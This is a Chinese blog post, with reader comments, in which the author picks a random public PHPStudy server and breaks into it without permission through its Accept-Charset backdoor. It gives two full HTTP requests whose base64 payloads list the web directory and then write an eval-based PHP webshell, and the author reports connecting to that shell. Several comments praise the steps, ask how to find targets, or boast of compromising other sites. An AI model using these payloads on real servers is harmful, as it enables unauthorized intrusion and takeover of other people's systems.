OnionT@KillBoy
1810,7252字数 184阅读0分36秒阅读模式
AI智能摘要
当你以为PHPStudy环境安全无虞时,一个看似普通的phpinfo页面竟能成为入侵入口。本文将完整还原黑客如何利用编码参数漏洞,在目标服务器上实现目录遍历与Webshell植入的全过程。通过真实攻击案例演示,揭示老旧PHP版本中隐藏的致命风险,并附详细payload解析——这或许是你的服务器正在面临的隐形威胁。
— AI 生成的文章内容摘要
今天有点烦躁,所以得找点事刺激一下
于是,公网上搜了一个PHPstudy的站
测试payload看看有没有漏洞,果然、存在漏洞
看一下目录
GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZWNobyBzeXN0ZW0oImRpciBEOlxwaHBTdHVkeVxXV1dcICIpOw== Connection: closeGET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: ZnB1dHMoZm9wZW4oJ0Q6XHBocFN0dWR5XFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFtraWxsXSk/PicpOw== Connection: close
再次查看一下目录,可以看到成功了
连接,OK,收工。。。
印度 1F
这payload看着有点眼熟,是那个Accept-Charset的漏洞吧?
广东省深圳市 2F
刚入坑的小白问下,这个漏洞影响phpstudy所有版本吗?🤔
上海市 3F
之前帮朋友处理过类似情况,也是被传了shell,折腾半天才清理干净。
陕西省西安市 4F
这个漏洞好像需要特定配置才会触发?
日本 5F
代码里那个base64解码出来是执行dir命令吧,有点东西。
内蒙古 B1
@ 暗黑魔王 dir命令执行那块base64解出来确实是列目录,后面写shell也顺理成章。
江苏省常州市 6F
测试环境用phpstudy的确实不少,方便是方便但安全配置容易疏忽。
上海市 7F
图片里是5.4.0版本,现在新版本还有这个问题不?
安徽省安庆市 8F
666,步骤挺清晰的,适合跟着复现一下。
上海市静安区 9F
这种老漏洞实战中还能碰到,说明很多站运维真不上心啊。
山东省 10F
感觉过程描述可以再细点,比如怎么定位到那个站点的。
湖北省武汉市 B1
@ 铁拳无敌 定位站点是不是用的fofa或者shodan啊?求个具体方法。
澳大利亚 11F
这漏洞复现起来其实挺简单的,照着步骤走就行。
湖北省武汉市 12F
Accept-Charset那个老洞了,没想到现在还有人中招。
河南省洛阳市 13F
我上周刚扫到一个站也是这个漏洞,直接getshell了。
上海市 14F
新手问下,PHPstudy不是本地开发工具吗?怎么公网还能搜到?🤔
陕西省咸阳市 15F
老版本PHPstudy默认开远程访问,很多小白根本不知道关。
河南省新乡市 16F
5.4.0太老了,但架不住有人还在生产环境跑这个……无语。